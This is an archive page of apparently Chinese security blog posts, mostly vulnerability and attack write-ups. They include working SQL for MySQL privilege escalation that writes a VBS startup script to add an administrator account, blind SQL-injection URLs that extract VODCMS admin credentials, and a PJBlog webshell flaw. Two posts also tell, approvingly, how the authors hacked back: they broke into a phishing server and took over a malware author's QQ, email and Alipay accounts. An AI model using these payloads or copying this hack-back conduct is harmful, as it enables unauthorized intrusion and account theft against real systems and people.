存档

‘渗透测试’ 分类的存档

PJBlog 3.2.9.518 getwebshell 漏洞

2012年5月9日 4 条评论

作者:不走的钟

版本:PJblog 3.2.9.518(2012/5/9日时为最新版本)

漏洞利用条件:

1、使用全静态模式(默认情况是全静态模式)

2、用户可以发帖(默认普通用户不能发帖,所以有点鸡肋)

漏洞描述:PJblog 3.2.9.518使用js过滤特殊字符,在使用全静态模式下,普通用户发帖即可插入asp一句话木马。

阅读全文…

中文版Putty 后门分析

2012年1月31日 4 条评论

作者:不走的钟

  今天IT行业微博热点 中文Putty多款软件存在后门,有的说被绑马,有后门众说纷纷。简单地说软件后门可以分为二种:

  一、正常软件与木马进行捆绑,当用户运行软件时,木马或者病毒自动运行,用户不知不觉便中了招。

  二、在软件代码中加入了特殊代码,让软件有“特别”的功能,如发送口令到指定服务器,完成木马功能。

阅读全文…

windows 2008 mysql 提权

2010年5月17日 1 条评论

作者:不走的钟
来源:http://www.007hack.com/?p=567
         mysql 5.1版本以上,必须把udf文件放到mysql安装目录下的lib/plugin下才能创建自定义函数,mysql into dumpfile并不能创建文件夹,所以mysql 5.1以上的版本,root权限提权就很困难了,目前已有的方法只有写启动项如下:

create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user 007hack.com qwer1234!@#$qwe /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 007hack.com /add"",0) " );

 

windows 2008启动项:

C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs
select * from a into outfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs";

 

写启动项缺陷:
1、需要服务器重启(如果管理员3389远程桌面登陆时注销了用户,再次3389连接时,这个脚本就会运行,添加一个管理员,不需要重启)。
2、安全软件可能会拦截。

 

补充:
如果mysql小于5.1是root权限,windows 2008一样可以拿到系统权限(mysql无降权处理)
1、mysql导出一个dll

SELECT udf FROM 007hack_tab INTO DUMPFILE 'c:/007hack.dll

//udf内容网上早有公开

2、创建一个函数

create function myconnect returns integer soname 'c:\\007hack.dll

//c盘要可以写,注意是”\\”

3、调用这个函数

select myconnect('".$chost."','".$cport."')

//这只是一个例子

VODCMS 6.0搜索型注入漏洞

2010年4月7日 3 条评论

作者:不走的钟

来源:http://www.007hack.com/?p=544

官方描述:

 vodcms 点播管理系统,文全称为Video-On-Demand Content Management System,中文全称为 秀影。希望我们的努力能为您提供一个高效快速和强大的点播管理解决方案。

不走的钟做网站安全检测时,发现有一套VODCMS6.0系统,搜索的地方习惯性加一个单引号,错误如下:

很明显存在mysql搜索型注入,

SELECT COUNT(*) as total FROM vodcms_movie AS a WHERE 1=1 AND a.`locked` = 0 AND a.`title` LIKE ‘%1′%’ AND a.lookgid <> 2
我们来构造下sql语句,搜索:

1′ and 1=1 and ‘%’='   //返回页面正常,无报错,说明sql语法正确。

VODCMS默认后台为/admin/

下载VODCMS 6.0,解压后找到install\vodcms.sql部分内容如下:

-- 表的结构 `vodcms_admin`
--
DROP TABLE IF EXISTS `vodcms_admin`;
CREATE TABLE `vodcms_admin` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` char(30) NOT NULL,
  `password` char(32) NOT NULL,
  `realname` varchar(50) NOT NULL,
  `group` varchar(30) NOT NULL,
  `logintime` int(11) NOT NULL,
  `lastime` int(10) unsigned NOT NULL,
  `lastip` char(16) NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `locked` tinyint(3) unsigned NOT NULL,
  PRIMARY KEY (`id`)
) TYPE=MyISAM  AUTO_INCREMENT=2 ;

这里不能使用union,如果有权限load_file虽然可以用,但是非常麻烦,如果你不知道网站路径,可以参考本站另一篇文章apache路径大全

知道了后台和管理员表,还可以通过肓注来获取管理员后台密码,代码如下:
管理员用户:

http://www.007hack.com/index.php?type=title&keyword=1' and (select ascii(substr((select username from vodcms_admin where id=1),1,1)))>=1 and '%'='&mod=content&action=search&x=22&y=17

管理员密码:

http://www.007hack.com/index.php?type=title&keyword=1' and (select ascii(substr((select password from password where id=1),1,1)))>=1 and '%'='&mod=content&action=search&x=22&y=17

当然这样手工很累,使用“关键字”写了一个小工具10分钟就跑出来了32的md5,工具很简单但不通用,这里不公开了。
小技巧:
网站根目录下的robots.txt可以查看版本信息,本文在6.0.0下测试通过。

说明:
由于VODCMS 6.0非开源代码(PHP已加密),本站无法提供解决方案,已通知官方,请大家等待补丁并及时更新。

 

 

实战–反击QQ钓鱼攻击

2010年2月9日 2 条评论

作者:不走的钟–007安全小组     

       腾讯不仅在技术上对QQ安全上做了很大的努力,而且还在认证管理上下了一翻心思(如激活、异地登陆等认证策略),然而很多网友还是丢了密码,导致通过QQ骗钱、诈骗等事件屡屡发生。下边通过实例给大家看看钓鱼网站的真面目,钓鱼网站如下(QQ群中看到的):
qoobs.us
www.freeqqs.com
www.3gqqcn.com
www.yearqq.com
www.3gregis.com
这几个网站在同一服务器上,为同一人所开,服务器在美国。

打开界面如下:

1

点击“我要免费Q币”

2

当你输入QQ和密码后,QQ和密码将以明文记录到网站后台,原以为这种钓鱼网站只能骗骗小孩,可在免费的Q币的诱惑下,还是有很多人上当,泄露了QQ密码,后台可以看到很多的QQ和密码(有管理员口令才能看到):

qq1
这套钓鱼程序N年前就见过,而且还存在几个漏洞,不过在以前的基础上添加了防注等功能,但是依然没有从根本上解决漏洞所在,不走的钟和CC经过半个小时的努力,拿到了webshell:

2jpg

十分钟后拿到了服务器权限:

3389

 

总结:

        免费QB、免费申请7位QQ、 QQ中奖均为古老的骗术,天下没有免费的午餐,提醒大家保护好自己的密码!这不仅仅是一个QQ号码的问题,如果别人使用你的QQ登陆后,和你的家人、朋友、同事”聊天”,那是多么的可怕 ……

实战–简单反击黑客钓鱼攻击

2010年2月2日 6 条评论

作者:不走的钟–007安全小组成员

来源:http://www.007hack.com/?p=444

常常收到QQ群发邮件,从来不看,不过今天这个邮件标题隐含着另人好奇而悲愤的故事而且还带有附件视频,下载后如下图:

1

格式是EXE格式,略有安全意识的朋友可能会使用杀病毒软件来检测下,我当然也不例外,使用360杀毒软件、小红伞杀毒软件和查捆绑工具检测无病毒并且只有一个头文件。

2

不走的钟提示:杀毒软件提示无病毒并不代表这个文件是安全的!一般情况最新的病毒、木马杀毒软件是无法检测到的。

到了这步可能很多人都觉得这个文件很安全,仅仅300K的视频文件,我凭着职业习惯,还是使用PE检测是否加壳,如果正如我所料,如下图:

3

使用eXP的壳,可能是木马!300K,对木马来说这算比较大的了,凭着感觉应该是远程控制木马。我有测试环境不用脱壳,在VM中开启监视工具运行那个EXE,发现新增了服务和注册表项,使用netstat结果如下:

4

很明显远程反弹木马,本地通过Tcp 1248端口远程连接到对方的8000端口,现在呢这台VM就成了常说的肉鸡了,黑客可以通过客户端对这个VM进行任意远程管理。但这样我已经知道了黑客的IP地址为:120.3.4.25属于河北省保定市,大概位置就在:

7

不走的钟提示:如果给您造成了损失,你现在就可以报警了!

反击黑客

 对远程反弹木马比较了解的朋友都知道,一般反弹木马是通过域名解析、URL、加密字符来上线的。找到木马对应的服务然后禁用,重启VM,这个那个木马就没法启动了。这时候我们开启wireshark,再次运行那个木马,wireshark结果如下:

5

抓包内容可以看到木马使用了yuanlt.3322.org上线,通过ping返回的结果正是如上图IP。经过和朋友CC讨论和测试,很快确定这位黑客的网名为“枫叶”QQ为:24945435X(最后一位隐藏下),然后我们通过一系列的努力,轻松得到了黑客的QQ密码,使用QQ邮件登陆以后如下图:

QQ

还开通了支付宝,

qq22 拷贝

其中还什么域名管理密码、3322.org、百度空间、51空间密码、用户账号和密码等很多个人信息。

总  结

此文没有任何技术含量,意在提醒广大网民朋友,上网千万要注意安全,别为了看热闹而沦为了肉鸡!同时提醒这位“黑客”朋友,请先保护好自己!